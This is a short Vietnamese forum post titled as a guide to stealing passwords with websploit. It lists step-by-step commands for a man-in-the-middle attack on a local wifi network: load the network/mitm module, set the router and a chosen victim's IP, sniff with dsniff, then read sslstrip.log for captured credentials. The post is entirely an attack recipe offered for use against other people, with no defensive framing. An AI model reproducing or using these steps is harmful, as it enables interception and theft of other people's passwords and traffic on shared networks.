[size=39]Hướng dẫn dùng websploit để đánh cắp mật khẩu[/size]
[size=39]
[/size]
Thực hiện websploit

 2- Tớ viết lệnh sau đây để hiển thị các module : show modules

 3 Bây giờ tớ chọn mạng / MITM bằng lệnh :
use network/mitm
show options
set interface eth0
Lệnh bên trên là giúp tớ tiến hành công việc !!
-Các Router ip  : set router 192.168.0.1

-Các IP máy chủ mà bạn muốn sniff mật khẩu , có thể sử dụng etercap và xem các kết nối với wifi của IP và chọn một trong số họ dùng lệnh :

set target 192.168.0.11

- Tớ chọn các loại sniffer, trong trường hợp này tớ chọn sniff  là các url  của nạn nhân ;

set sniffer dsniff

tớ chạy nó : runBây giờ chúng ta hãy các thư mục chủ và kiểm tra các tập tin sslstrip.log  và thấy kết quả !!!!
 ai không hiểu xem video nhé !!


VNXZ | FORUM
Bùi Văn Minh / Admin
minhmen99@gmail.com / 0164282117

VNXZ | FORUM
http://vnxzforum.net